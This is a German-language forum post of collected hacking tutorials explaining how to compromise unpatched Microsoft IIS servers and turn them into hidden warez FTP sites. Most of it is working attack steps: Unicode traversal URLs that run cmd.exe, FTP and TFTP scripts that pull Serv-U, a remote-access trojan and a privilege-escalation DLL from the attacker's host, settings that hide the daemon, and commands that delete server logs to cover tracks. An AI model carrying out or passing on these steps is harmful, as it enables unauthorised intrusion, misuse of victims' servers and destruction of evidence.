viele iis tuts

Dieses Thema im Forum "Security Tutorials" wurde erstellt von theiba, 2. Oktober 2004 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 2. Oktober 2004
    Viele IIS Tutorials

    Hab hier mal viele IIS Tutorials (Anleitungen) gesammelt, von einem allein hab ichs net verstanden, aber nach dem ich alle gelsen hab hats bei mir gefutzt


    IIS Tuts


    TuT 1:

    1. Du brauchst folgende Tools :
    - ServU FTP-Server 3.0 (Serv-U FTP Server - Secure FTP Server Software for Windows and Linux - crack bei ASTALAVISTA.BOX.SK)
    - TFTP Server (Top Themen A-Z)
    - IIS Scanner (Google à suche nach IIS-Scanner)


    2. Mit dem IIS-Scanner scannst du nach IIS-Servern, mehr sag ich dazu net!
    3. ServU konfigurieren
    - Starte ServUAdmin
    - Local-Server
    - Domains à New Domain
    - Das Feld „Domain IP Adress“ leerlassen!!!
    - Im Feld „Domain Name“ kannst du irgendeinen Namen eingeben
    - Bei Port gibst du irgendeinen Port deiner Wahl ein!
    - Bei „Domain Type“ wählst du „Store in INI File“ aus!!
    - User à New User
    - Bei „User Name“ gibst du irgendeinen Namen ein
    - Bei „Password“ gibst di irgendein Passwort ein
    - Bei „Home Directory“ gibst du „c:\“ ein!
    - Bei „Look User into Home Directory“ kreuzt du „NO“ an!
    - Bei „Privilege“ wählst du „System Administrator“ aus!!!!!!!!!!!
    - Geh auf „Dir Access“ und füge die Laufwerke c:\ bis m:\ hinzu, wobei du c:\ nicht mehr hinzufügen musst!
    - Dann hackst du bei jedem Laufwerk alles an:
    - 1. Write
    - 2. Read
    - 3. Append
    - 4. Delete usw.!!
    - Nun ServUAdmin beenden!

    4. Nun starte den TFTP Server!
    - Gehe auf Options à Einstellungen à Server und wähle als TFTP Hauptverzeichnis den Ordner aus, in dem die ServUDaemon.exe und die ServUDaemon.ini sind!!!
    - TFTP nicht beenden

    5. Nun musst du mit Hilfe von Unicode Exploits sie gescannten IIS-Server überprüfen!
    - Am meisten kommen folgende Scripts vor:
    - http://ZIELIP/scripts/..%255c..%255c..%2...../c+dir+c:\
    - http://ZIELIP/scripts/..%c0%af../winnt/s...../c+dir+c:\

    6. Nun gibst du bei ZIELIP, eine IP der gescannten IIS-Pubs ein und kopierst diesen Befehl und fügst ihn, in dem Internet Explorer als URL ein! Wenn nun Verzeichnisse und Dateien aufgelistet werden, kannst du dein Glück veruschen, wenn nicht musst du die nächste IP nehmen!

    7. So lädst du die ServUDaemon.exe und die ServUDaemon.ini auf den IIS-Server!
    -http://ZIELIP/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+tftp+-i+DEINE IP+get+ServUDaemon.ini+c:\Irgendein Pfad auf dem Server\ServUDaemon.ini

    http://ZIELIP/scripts/..%255c..%255c..%2.....c+tftp+-i+DEINE IP+get+ServUDaemon.exe+c:\Irgendein Pfad auf dem Server\ServUDaemon.exe

    Oder mit diesem Script hier, kommt drauf an mit welchem es funzt!

    http://ZIELIP/scripts/..%c0%af../winnt/s.....c+tftp+-i+DEINE IP+get+ServUDaemon.ini+c:\irgendwein Pfad auf dem Server\ServUDaemon.ini

    http://ZIEL IP/scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp+-i+DEINE IP+get+ServUDaemon.exe+c:\Irgendein Pfad auf dem Server\ServUDaemon.exe

    8. Wenn du dann auf das TFTP-Server Symbol unten rechts neben der Uhr klickst siehst du ob die Dateien hochgeladen werden/wurden oder ob sie nicht wurden! Falls sie nicht hochgeladen wurden musst du dir einen neuen Server suchen, wenn die datein erfolgreich hochgeladen wurden, startest du den Server mit folgenden Befehlen!
    -
    http://ZIELIP/scripts/..%c0%af../winnt/s.....ServUDaemon.exe /h
    http://ZIELIP/scripts/..%c0%af../winnt/s.....ServUDaemon.exe /h

    http://ZIELIP/scripts/..%255c..%255c..%2.....ServUDaemon.exe /h
    http://ZIELIP/scripts/..%255c..%255c..%2.....ServUDaemon.exe /h

    9. Wenn alles erfolgreich geklappt hat, ist der Pubstro fertig! Nein! Noch nicht ganz! Jetzt startest du ServUAdmin und machst folgendes!
    - Du erstellst neben dem Local Server einen Neuen Server
    - Bei „IP Adress“ gibt’s du die IP Adresse des Server ein, auf den du die Dateien per TFTP hochgeladen hast ein
    - Bei „Port“ gibst du den Port ein, den du bei PUNKT 3 eingegeben hast auch ein!!
    - Bei „FTP Server Name“ gibst du irgendeinen Namen ein
    - Bei „Username“ und „Password“ gibbst du die selben Daten, die du in PUNKT 3 eingegebn ahst auch ein!!!!!
    - Nun startest du den Server
    - Wenn er erfolgreich connectet hat kannst du neue User hinzufügen!
    - Ich erkläre das an einem User, der nur downloadrechte besitz!!
    - User à New User
    - Name und Passowrd à leech (kann man nach belieben eingeben!!)
    - Bei „Home Directory“ gibst du das Laufwerk und den Pfad ein, in dem das geuppt/geflashte Zeug ist ein!!!!
    - Bei „Look User into Home Directory“ hackst du „YES“ an!
    - Bei „Dir Access“ brauchst du in diesem Fall nix mehr einstellen! Du musst nur dann dort etwas ändern, wenn der User noch Upload Rechte haben soll, aber das erkläre ich net, das seht ihr dann schon selbst!

    10. Nun ServUAdmin beenden und ferig ist der Pubstro!

    11. GANZ WICHTIG!! LÖSCHT EURE LOGFILES!!! DA EIN IIS-SERVER(INTERNET INFORMATION SERVER JEDE AKTION LOGT!!!)
    - Entweder so:
    - http://ZEILIP/scripts/..%255c..%255cwinn.....c:\*.log/s
    - http://ZIELIP/scripts/..%c0%af../winnt/s.....c:\*.log/s
    - oder mit eurem Admin Axx:
    - connectet zu eurem Pubstro mit eurem Admin Account
    - geht in den Ordner Winnt/System32/Logfiles/ und löscht dort die LogFiles!



    TuT 2:

    Da es immer wieder Leute unter uns gibt die irgendwie mit den gängigen
    Tutorz übers Pub-hacken nicht klarkommen ,dachte ich mir , das ich nun
    mal eins schreiben sollte das alles ganz ausführlich der Reihe nach
    erklärt...


    Dieses Tutor ist nur zu theoretischen Zwecken gedacht und nicht um
    irgendjemandem Schaden zuzufügen (z.B. durch den hohen Traffic der
    durch das hacken den Servern zugute kommt). Die reale Anwendung
    der hier aufgeführten Art einen Server zu hacken liegt in euer
    eigenen Verantwortung.
    Ich übernehme keinerlei Verantwortung für jede Art von Folgen die
    ihr oder euer Opfer daraus zieht...
    Ich schreibe dieses Tutor nur um euch die theoretische Möglichkeit
    näher zu bringen , wie man einen Bug ausnutzt und diesen zu seinen
    eigenen Zwecken ausnutzen kann...


    Hacken ist gefährlich und man sollte es nur mit bedacht tun !
    Hacken ist strafbar und man sollte sich nicht erwischen lassen !
    Hacken ist nichts für kleine Script-Kiddies die keinen Plan haben ;P !

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



    Also, wollen wir mal Loslegen...
    Wir brauchen auf unserer Machine folgende Programme :
    - irgendeinen funxionierenden Browser , dabei ist es egal
    ob wir Linux oder Windoof oder ein anderes Betriebssys benutzen.
    - Zu eurer eigenen Sicherheit würde ich mir ein Proxy-Tool
    suchen , ich verwende MultiProxie und habe damit gute Erfahrungen
    gemacht . Jedoch werde ich jetzt nicht erklären wie man es einrichtet ,
    denn das steht auf deren Website
    - Einen IIS-Scanner der Server nach dem Unicode-/CGI-Bug von NT Servern
    abscannt ...
    - Ein FTP-Programm ...(z.B. FlashFXP)
    - Serv-U , das wohl wichtigste Programm das wir brauchen ,
    kriegt man auch im Internet
    - Nicode ,wenn ihr bisschen rumprobieren wollt ...
    - `nen Tripod-Account (oder nen anderen FTP-zugang mit root-Rechten)

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



    1.)
    Als erstes installiert ihr jetzt Serv-U und konfiguriert den Port und
    die Login-Daten genau so , wie die späteren Login-Daten von dem Server
    sein sollen ... Interessant hierbei ist für uns am ende nur die
    Serv-u.exe und die Serv-u.ini...


    2.)
    Wir öffnen die Serv-U.ini , denn wir wollen noch ein bischen was dazu
    schreiben, damit uns der Admin nicht so schnell entdeckt...
    unter der Sektion [GLOBAL] fügen wir die Zeile

    INVISIBLE=TRUE ein...

    das bewirkt , das Serv-U nicht sichtbar auf dem Server gestartet wird...


    3.)
    bei eurem eingerichteten USER sollten die Zeilen ungefähr
    so aussehen :

    HomeDir=c:
    AlwaysAllowLogin=YES
    Access1=h:,RWAMCDLEP
    Access2=g:,RWAMCDLEP
    Access3=f:,RWAMCDLEP
    Access4=e:,RWAMCDLEP
    Access5=d:,RWAMCDLEP
    Access6=c:,RWAMCDLEP
    Access7=j:,RWAMCDLEP

    inklusive solltet ihr Zwei verschiedene USER eingerichtet haben
    einmal euer Zugang , der die kompletten Schreibrechte hat (s.o)
    und einen Zugang für remote-USER , die zB keine Schreibrechte haben
    sollen, der remote-USER account würde ungefähr so aussehen:

    Access1=c:,RLP
    Access2=d:,RLP (usw.)


    4.)
    Danach brauchen wir unseren Tripod-Account ;P ,
    dort laden wir ins root-Verzeichniss unsere Serv-U.exe und unsere
    konfigurierte Serv-U.ini...
    mehr brauchen wir dort erst mal nicht machen .


    5.)
    Jetzt benutzen wir den IIS-Scanner und suchen uns eine Range aus
    erfahrene Scanner gucken im IP-Index nach, oder man nimmt eine
    Hostlookup-Engine um Die Ip einer Site rauszufinden ...
    nun geben wir in unserem IIS-Scanner eine nette Range ein , die ihr
    euch ausgeguckt habt, und wir scannen ein bischen (kann manchmal auch
    recht lange dauern).
    Wenn uns dann der Scanner Einen Server anzeigt sollten wir uns mal die
    IP schnappen...


    6.)
    Nun starten wir den InternetExplorer und geben folgende zeile ein

    http://##IP##/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:

    ##IP## steht hierbei für die IP des gescannten Servers ...
    mit dieser Zeile machen wir uns den Unicode Bug zunutze
    denn dieser String (/scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c)
    bewirkt das man ins root-Verzeichniss des InetPub gelangt ..
    und mit +dir+c: kriegen wir den gesamten Inhalt des Laufwerkes c:
    zu Gesichte ... schön oder ?
    und genau das machen wir uns zu nutze , denn wir können alle Dos-Befehle
    zu unseren Zwecken nutzen mit diesem Bug ...


    7.)
    WIR erstellen uns nun ein Verzeichnis wo wir unser kleines Serv-U
    platzieren wollen ; dieses Verzeichniss sollte nach Möglichkeit
    unauffällig sein damit
    der Admin keinen Verdacht schöpft ...

    http://ip/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+mkdir+c:winntsystem32temporary
    Manchmal haben wir aber keine Schreibrechte für WINNT-Unterverzeichnisse,
    also müssen wir improvisieren :

    http://ip/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+mkdir+c:tempetcetcetc
    d.h. ihr könnt euch nen verzeichniss nach euren Wünschen erstellen
    wenn das Verzeichniss erstellt wurde , kommt eine CGI-Fehlermeldung...


    8.)
    Nun schauen wir ob das Verzeichniss tatsächlich existiert :

    http://ip/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:winntsystem32 emporary

    den Pfad müsstet ihr nach eurem anpassen
    wird nun ein leeres Verzeichniss angezeigt , dann waren wir erfolgreich ..


    9.)
    http://ip/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+copy+c:winntsystem32cmd.exe+superlol.exe

    dies brauchen wir um uns den Dos-Echo Befehl zu nutzen, damit wir auch
    eine Datei erstellen können
    und in jene auch schreiben können ...


    10.)
    Darauf erstellen wir in unserem Verzeichniss eine .txt Datei
    welche wir als FTP-Script nutzen , damit sich der Server per FTP auf
    unserem Tripod-Account einwählt und sich dann Serv-U.exe -.ini downloadet..

    http://ip/scripts/superlol.exe?/c+echo+open+##IPVOMFTPSERVER##+##PORT##>>c:winntsystem32 emporaryftpscr.txt

    http://ip/scripts/superlol.exe?/c+echo+##USERNAME##>>c:winntsystem32 emporaryftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+##PASSWORD##>>c:winntsystem32 emporaryftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+BINARY>>c:winntsystem32 emporaryftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+get+serv-u.exe>>c:winntsystem32temporaryftpscr.txt


    http://IP/scripts/superlol.exe?/c+echo+get+servu.ini>>c:winntsystem32 emporaryftpscr.txt

    http://IP/scripts/superlol.exe?/c+echo+quit>>c:winntsystem32 emporaryftpscr.txt

    Diese Zeilen geben wir nach einander ein im browser , dadurch werden die
    commandos für den Server
    geschrieben ...
    Sollte doch eigentlich klar sein , was das bedeutet ;P


    11.)
    schauen wir uns die Datei erst nocheinmal an, ob auch alles richtig ist...
    wenn jetzt folgendes Erscheint ist alles okay *grins*:

    http://ip/scripts/superlol.exe?/c+type+c:winntsystem32 emporaryftpscr.txt

    open ##IP-VOM-FTP-SERVER##
    ##USERNAME##
    ##PASSWORD##

    BINARY
    get serv-u.exe
    get serv-u.ini
    quit


    12.)
    http://ip/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+ftp+-s:c:winntsystem32 emporaryftpscr.txt
    mit dieser Zeile führen wir nun unser kleines Script aus ...
    und der Server connected nun zu eurem Tripod-Account und holt sich euer
    Serv-U


    13.)
    jedoch liegen die Dateien nun im InetPub Verzeichniss des Servers , da wir
    aber jene in unser
    eigenes Verzeichniss verschieben wollen geben wir folgendes ein :

    http://ip/scripts/superlol.exe?/c+move+serv-u*.*+"c:winntsystem32 emporary"


    14.)
    Um unsere Spuren zu verwischen löschen wir vorsichtshalber noch einmal die
    Script Datei

    http://ip/scripts/superlol.exe?/c+del+ c:winntsystem32 emporaryftpscr.txt+/Q/F


    15.)
    http://ip/scripts/superlol.exe?/c+dir+c:winntsystem32 emporary

    jetzt schauen wir nach ob Serv-u.exe und Serv-u.ini sich in unserem
    Verzeichniss befinden
    und ob die Script Datei gelöscht wurde ...
    wenn alles in Ordnung ist können wir jetzt weitermachen


    16.)
    Anschließend führen wir Serv-U auf dem Server aus ...
    mit folgendem Befehl ist uns jenes auch sofort möglich ...

    http://ip/scripts/superlol.exe?/c+c:winntsystem32temporaryserv-u.exe+serv-u.ini

    man sollte ein paar Sekunden warten bevor man mit Versucht sich mit dem
    FTP Proggy einzuloggen...
    Wenn man Pech hat , dann hat man einen Server mit Firewall erwischt , das
    merkt man einfach daran das man
    nicht connecten kann ...
    wenn alles klappt könnt ihr euch aber mit euren Serv-U Einstellungen nun
    Problemlos einloggen ...


    17.)
    Jetzt sind wir im Root Verzeichniss des Servers... und haben auch volle
    Schreibrechte...
    Als nächstes suchen wir uns ein Unterverezeichniss oder erstellen eins, welches
    wir als das Verzeichniss benutzen
    wollen wo wir uploaden wollen...
    wenn dies geschehn ist müsst ihr nochmal die Serv-u.ini öffnen und jene
    jetzt anpassen :
    euer Account mit den Schreibrechten müsste dann so aussehen (Bsp.):

    HomeDir=d:MelindaWORKsampleLESSONnew

    AlwaysAllowLogin=YES
    Access1=h:,RWAMCDLEP
    Access2=g:,RWAMCDLEP
    Access3=f:,RWAMCDLEP
    Access4=e:,RWAMCDLEP
    Access5=d:,RWAMCDLEP
    Access6=c:,RWAMCDLEP
    Access7=j:,RWAMCDLEP
    RelPaths=YES

    und der Account zum Leechen so :

    HomeDir=d:MelindaWORKsampleLESSONnew

    RelPaths=YES
    Access1=d:MelindaWORKsampleLESSONnew ,RLP


    18.)
    nun gehen wir nochmal in das Verzeichniss wo unser Serv-U liegt und
    überschreiben
    die INI datei mit unserer neuen ...


    19.)
    wir reconnecten , und nun müssten wir in unserem Verezeichniss landen
    und man sollte es als root-Verzeichniss sehen...


    20.)
    ENDLICH könnt ihr euren gehackten Pub fillen...
    Das gute an Serv-u ist , das nun der Server Fxp-able und Resumeable ist...
    gepostet wird der Account ohne Schreibrechte, also kann auch kein Schwein
    euren
    Stuff deleten... !!!!!!!!!!!! DeLeTeR`S!!!!!!!!!!!!!!


    21.)
    enJoY

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


    das nun der Server Fxp-able und Resumeable ist...
    gepostet wird der Account ohne Schreibrechte, also kann auch kein Schwein
    euren
    Stuff deleten... !!!!!!!!!!!! DeLeTeR`S!!!!!!!!!!!!!!


    21.)
    enJoY

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




    ¯`°²º¤æ=«.,¸_ ©]R00kY[ _¸,.»=椺²°`¯
    +++++++++++++++++++++++++++++++++++++++++++++++++++
    ][------------+---Pub-Hackin-Tutor--+------------][
    ][------bY ]R00kY[ a MeMbEr oF Koop99 FxP--------][
    +++++++++++++++++++++++++++++++++++++++++++++++++++



    TuT 3:

    -----------------------------------------
    | |
    | Project One (1.exe - v.1.0.18) |
    | |
    | Erklaerungen zum Tool (v.0.1b) |
    | |
    | |
    | - written by KaySteven - |
    -----------------------------------------


    INHALTSVERZEICHNIS:
    - - - - - - - - - -

    1. Package-Inhalt:

    > 1.exe (Tool)
    > IP.txt (IP-Ranges Liste)
    > u.txt (Commandlines)
    > username.txt (Daten)
    > Tool-Erklaerung.txt

    2. Tool:

    Hierbei handelt es sich um das eigentliche Tool, mit dem ihr arbeiten werdet.
    > Oben seht ihr die IP-, UnicodeBug- & Commandline-Anzeige.
    > Links seht ihr die IPs, die ihr auswählen könnt.
    > rechts seht ihr die kompletten "Befehle",d ie ihr durchgehen könnt (Es werden
    nicht immer alle benötigt; werdet ihr aber noch sehn)
    > unten sehr ihr die Angaben zur jeweiligen IIS (IP, IIS-Version, Laufwerk +
    zugehöriger freier Speicher)

    3. IP-Ranges Liste

    Hier könnt ihr eure, mit dem "IIS Scanner" gescannten, IP-Ranges einfügen. Beachtet
    bitte, dass zwischen IP, IIS-Version & Laufwerk + freiem Speicher ein Leerzeichen
    stehen muss, ansonsten kommt es zu Komplikationen bei der Benutzung der IP durch
    das Tool selbst (-> falsche IP-/Unicode-Anzeige)

    4. Commandlines

    Info: Vor Benutzung des Tools müsst ihr die Zeilen mit IP, PORT, USER & PW noch
    ausfüllen. Dort soll der Pub(stro) mit Daten hin, worauf eure FTP-Server
    Files liegen & die zum IIS transferriert werden sollen.

    Zur besseren Verständnis habe ich die einzelnen Commandlines zu Gruppen zusammengefasst,
    was sowohl der Übersicht als auch dem Verständnis zu Gute kommen sollte! Die Befehle
    dürften den meisten Leuten klar sein, da sie aus alten Dos-Zeiten evtl bekannt sind,
    oder?! Bei Fragen, bitte an mich wenden; werde dann alle Commandlines in der neuen
    "Erklärung" erläutern!

    5. Daten

    Hier könnt ihr eure Daten eintragen:

    > Serverport
    > Filler-Account
    > Leecher-Account
    > Admin-Account

    6. Disclaimer:

    Da möchte ich mich doch auch gleich mal von jeglicher Nutzung illegaler Art lossagen
    und euch klarmachen, dass dieses Package nur zu Anschauungszwecken dient; z.B. um
    euren eigenen Server gegen "fremde Zugriffe von außen" zu sichern!


    have phun & so long...
    KaySteven





    TuT 4:

    Benötigt:

    Serv-U
    TFTP+Proxy oder pub+proxy
    Proxy Server JAP



    Wollt ihr wissen wie man ein IIS server hackt?Hier ein tut.Ich glaub ier gibs schon eins (weiß nicht genau) aber noch eins ist auch gut
    Also, dann mal los.
    Zu erst mal eine kleine Liste mit dem, was ihr braucht:
    Einen Webserver mit dem IIS-Bug, der noch nicht gepatched wurde
    Die IIScrack.dll (die ihr zu httpodbc.dll umbenennen müsst), die es unter http://www.digitaloffense.net/ zum download gibt
    Einen IIS-Scanner, der den Pfad zum Unicode findet oder eine Liste mit möglichen Strings, die ihr
    durchprobieren müsst
    ShadowRemote, woher weiß ich leider nicht. Hab es bisher auch nur zugeschoben bekommen. Aber ich werde
    mal euren Admin fragen, ob ich es auf euren Webspace uppen kann. Dann kann es sich jeder selbst
    runterladen. Shadow Remote müsst ihr auf eurem eigenen PC installieren, da ihr die server.exe brauchen werdet
    Ein wenig Ahnung von DOS-Befehlen
    Aber nun zum eigentlichen Hacken:
    Kleiner Tip, damit es nicht zu Verwirrungen kommt: wenn ich bei einer Eingabezeile .../cmd.exe?/etc. schreibe
    solltet ihr logischerweise http://[IP]/scripts/[String]/cmd.exe?/etc. im Browser eingeben )
    1.
    Zuerst müsst ihr euch einen Webserver suchen, der mit dem IIS-Bug ausgestattet ist Wenn ihr einen gefunden
    habt, versucht ihr am besten erstmal entweder per Scanner den Pfad zum Unicode (bzw. String) zu finden, oder
    ihr versucht einen aus einer Liste oder tippt einfach wahllos irgendwas, vielleicht habt ihr ja Glück.
    Wenn ihr den Pfad gefunden habt, gebt ihr in eurem Webserver folgendes an:
    http://[IP]/scripts/[String]winnt/system32/cmd.exe?/c+dir+c:\
    anstatt c+dir+c:\ kann jeder andere DOS-Befehl verwendet werden, wie z.B. del, mkdir, move, copy, etc. Diese
    müsst ihr immer zwischen "c+" und "+" angeben. Hinter das 2te "+" kommt dann entweder der Pfad auf der Festplatte
    oder der Pfad zur Datei, die gelöscht, verschoben oder kopiert werden soll)
    Wenn ihr Glück habt, könnt ihr euch jetzt auf der Festplatte des Servers umschauen. Wenn eine Fehlermeldung kommt,
    dann verwendet entweder einen anderen String oder einen anderen Server
    2.
    Jetzt solltet ihr euch ein eugenes Verzeichnis erstellen. Am besten in einem Ordner, der vom Admin garnicht
    oder eher seltener durchsucht wird. Also z.B. c:\recycler\127364-986865-8547478-96974787\. Aber diese Verzeichnis
    wird es wohl kaum schon auf der Festplatte geben. Deswegen gebt ihr einfach mal in eurem Browser folgendes ein:
    http://[IP]/scripts/[String]winnt/system32/cmd.exe?/c+mkdir+c:\recycler\127364-986865-8547478-96974787\
    Falls jetzt folgendes im Browser erscheint, hat der Befehl funktioniert und wir könenn weitermachen:
    CGI Error
    The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
    Aber Achtung!!! Nur so lange nach dem ":" (Doppepunkt) am Ende nixmehr kommt, hat der Befehl funktioniert.
    3.
    Als nächstes solltet ihr die cmd.exe kopieren. Somit erspart ihr euch erstens dass wiederholte eingeben des
    Strings im Browser (falls ihr wirklich so n00big seit, wie ich manche von euch einschätze ) und zweitens
    auch die Logs, mit denen alle eure Aktivitäten auf dem Server nachgewiesen werden können. Das geschieht mit
    folgendem Kommando:
    .../cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+superlol.exe
    (den Namen superlol.exe müsst ihr natürlich nicht nehmen. Es ist vollkommen egal wie ihr die kopierte cmd.exe nennt)
    Ist das auch vollbracht sollte in eurem Browser folgendes erscheinen:
    CGI Error
    The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:
    1 file(s) copied.
    Sehr gut bis jetzt!
    4.
    Nun müsst ihr euch entweder einen eigenen FTP-Server einrichten, oder euch einen Pub bzw. WebHosting Account schnappen.
    Auf den Account, bzw. euren FTP-Server müsst ihr nun die httpodbc.dll und server.exe aus dem Shadow Remote Ordner.
    Jetzt müsst ihr euch über die zuvor kopierte superlol.exe ein kleines FTP-Script erstellen. Gebt dazu folgende Zeilen
    nacheinander in eurem Browser ein:
    http://[ip]/scripts/superlol.exe?/c+echo+open+195.186.201.28+2356>mondblumen.txt
    http://[ip]/scripts/superlol.exe?/c+echo+con>>mondblumen.txt
    http://[ip]/scripts/superlol.exe?/c+echo+con>>mondblumen.txt
    http://[ip]/scripts/superlol.exe?/c+echo+BINARY>>mondblumen.txt
    http://[ip]/scripts/superlol.exe?/c+echo+get+kill.exe>>mondblumen.txt
    http://[ip]/scripts/superlol.exe?/c+echo+get+tlist.exe>>mondblumen.txt
    http://[ip]/scripts/superlol.exe?/c+echo+get+rundll.exe>>mondblumen.txt
    http://[ip]/scripts/superlol.exe?/c+echo+get+servudaemon.ini>>mondblumen.txt
    http://[ip]/scripts/superlol.exe?/c+echo+get+login.txt>>mondblumen.txt
    http://[ip]/scripts/superlol.exe?/c+echo+quit>>mondblumen.txt
    Da von den meisten Virenscannern die Server.exe als ein Trojaner anerkannt wird (was sie ja eigentlich auch ist)
    empfehle ich jetzt euren AntiVirenScanner abzustellen, da jetzt auf die Server.exe zugegriffen wird.
    Um euer kleines FTP-Script nun auszuführen gebt ihr folgende Zeile im Browser ein:
    http://[ip]/scripts/superlol.exe?/c+ftp+-s:c:\InetPub\scripts\mondblumen.txt
    Falls ihr bei der IP, von dem die beiden Dateien abgeholt werden sollen eure eigene angegeben habt, müsstet
    ihr jetzt bei eurem FTP-Server sehen, dass sich jemand versucht auf eurem FTP einzuloggen und sich die
    Server.exe und die httpodbc.dll zu holen versucht (Falls ihr einen Webhosting-Account angegeben habt, solltet
    ihr einfach ein paar Sekunden warten). Wenn alles abgeschlossen ist, solltet ihr euch vergewissern,
    dass beide Dateien erfolgreich auf dem Server angekommen sind:
    http://[ip]/scripts/superlol.exe?/c+dir+c:\inetpub\scripts\
    Wenn die Dateien nicht angekommen sind, solltet ihr http://[ip]/scripts/superlol.exe?/c+type+c:\inetpub\scripts\ftpscr.txt
    eingeben um zu überprüfen, ob euer Script auch stimmt. Falls nicht könnt ihr es löschen wie unten beschrieben. Wenn es
    stimmt, die Dateien aber trotzdem nicht angekommen sind könnt ihr es entweder noch einmal ausführen oder den nächsten Server
    probieren
    Falls eure Dateien erfolgreich angekommen sind, solltet ihr die Server.exe in euer vorher angelegtes Verzeichnis
    verschieben:
    http://[ip]/scripts/superlol.exe?/c+move+Server.exe+c:\[Euer Pfad]\
    Folgeneds Kommando solltet ihr benutzen, um die ftpscr.txt wieder zu löschen, damit nicht jeder sofort weiß, wo
    ihr eure Daten ziehen lasst und ebenfalls connecten kann:
    http://[ip]/scripts/superlol.exe?/c+del+c:\inetpub\scripts\ftpscr.txt/Q/F
    Anschliessend führt ihr die httpodbc.dll auf dem Server aus:
    http://[ip]/scripts/httpodbc.dll
    Jetzt solltet ihr einen ziemlich weißen Bildschirm vor euch haben mit einem kleinen Eingabefenster und der Taste
    "execute", die ihr auf keinen Fall drücken dürft, sonst funktioniert es nicht. In dem Eingabefeld gebt ihr nun
    den Pfad zu der Server.exe ein und drückt ENTER!!!! NICHT EXECUTE!!!! ENTER!!!
    Hat alles funktioniert solltet ihr nun ein Fenster mit ungefähr folgenden Zeilen vpr euch sehen:
    :: currently running as the IUSR_TRANSNT1 account.
    :: exploit succeeded, running command as SYSTEM
    :: executing: c:\winnt\temp\etc\etc\etc\etc\etc\Server.exe
    :: command executed successfully
    Dann ist alles bisher schonmal sehr gut verlaufen. Jetzt solltet ihr versuchen, euch per dem Shadow Remote Client
    zu connecten. Dazu startet ihr ihn (Client, nicht Server!) auf eurer Festplatte, geht oben auf "Connect", gebt
    einfach nur die IP des Servers an und klickt nochmal auf "Connect". Ist alles gut verlaufen, solltet ihr nun für
    ca. 1 Sekunde lang ein Kleines Fenster in der Mitte von Shadow Remote sehen "Registration of User". Wenn dieses
    länger als 10 Sekunden bleibt könnt ihr den Server vergessen. Entweder er ist zu langsam oder er hat eine Firewall
    laufen, die euren Connect abblockt. Am besten nehmt ihr dann gleich einen andren Server. es gibt zwar auch
    zahlreiche Methoden, eine Firewall zu umgehn, aber vielleicht (!!!) schreibe ich das in einem andren Tut, sobald
    ich es selber weiß
    Kleiner Tip: Falls der Connect nicht gleich funktioniert, solltet ihr nicht das Protokoll wechseln, da es auf diese
    Weise (mit einem andren Protokoll) nie funktioniert
    Ist der Connect zustande gekommen, solltet ihr erstmal unter Remote Control -> Service Manager einfach nur auf
    "Open" klicken. Jetzt scrollt ihr runter und sucht den Prozess "W3SVC" suchen, einen Rechtsklick drauf machen und
    auf "Stop Service". Jetzt startet ihr den Filemanager, wechselt in das Verzeichnis "C:\InetPub\scripts\", löscht
    dort alle von euch angelegten Dateien, also die superlol.exe und die httpodbc.dll. Noch dazu löscht ihr in diesem
    Ordner alle TFTPxxx Dateien, die größer als 0 KB sind. Jetzt wechselt ihr in das Verzeichnis
    "C:\WINNT\system32\LogFiles\". Falls es da einen Ordner "W3SVC" gibt, wechselt ihr dort hinein und löscht alle Logs.
    Gibt es keinen müsst ihr dort nix machen.
    Jetzt sucht ihr euch ein geeignetes Verzeichnis für eure Serv-U Dateien. Falls ihr keins findet macht ihr euch halt
    eins. Dort werden die Serv-U.exe und Serv-U.ini reinkopiert.
    3 Tips: Ich benutze Serv-U 2.5e, ist simpler
    2er Tip: Ihr solltet in der Serv-U.ini direkt unter [GLOBAL] "INVISIBLE=TRUE" schreiben. Soll ja alles möglich
    versteckt bleiben
    3. Tip: Ihr solltet zuerst ein geeignetes Verzeichnis für Serv-U und euren Pubstro suchen und dann Serv-U
    entsprechend konfigurieren. Das kann euch einiges an unnötiger Arbeit ersparen
    Als letztes führt ihr die Serv-U.exe aus, indem ihr einen Doppelklick darauf macht. "Operation" sollte auf "Open"
    stehen und unter "Show Type" sollte "HIDE" ausgewählt sein. Jetzt nurnoch auf Run und euer Server ist gestartet.
    Jetzt erstmal connecten, ein schönes Portal machen und dann erstmal den Upload-, dann den LeechAxx weitergeben
    Als letztes noch eine Login.txt, mit der jeder User, sobald er connectet ein paar Server-Statistiken erfährt:
    ¸,o@´`'@o,¸¸,o@´`@o,¸¸,o@´`'@o,¸¸,o@´`'@o,¸
    '`^`'~=-.,__,.-=~'`^`'~=-.,__,.-=~'`^`'~=-.,__,.-=~
    Welcome To
    xxxx Pubstro
    '`^`'~=-.,__,.-=~'`^`'~=-.,__,.-=~'`^`'~=-.,__,.-=~
    ¸,o@´`'@o,¸¸,o@´`@o,¸¸,o@´`'@o,¸¸,o@´`'@o,¸
    ,¸¸,o@´`@o,¸Enjoy & Have Fun!¸,o@´`'@o,¸¸,
    YOUR STATS:
    IP: %IP ,
    Uploads: %BUp KB
    Downloads: %BDown KB
    Bandwidth: %ServerKBps KB/Sec
    Download: Yes
    Resume: Yes
    Upload: No
    Delete: No
    ?????????????????????????????????
    ??? Server Rules ???
    ?????????????????????????????????
    ?? No more than 1 login per IP ??
    ?? If 421 Don't Plz Hammer! ??
    ?????????????????????????????????
    ??? Server Stats ???
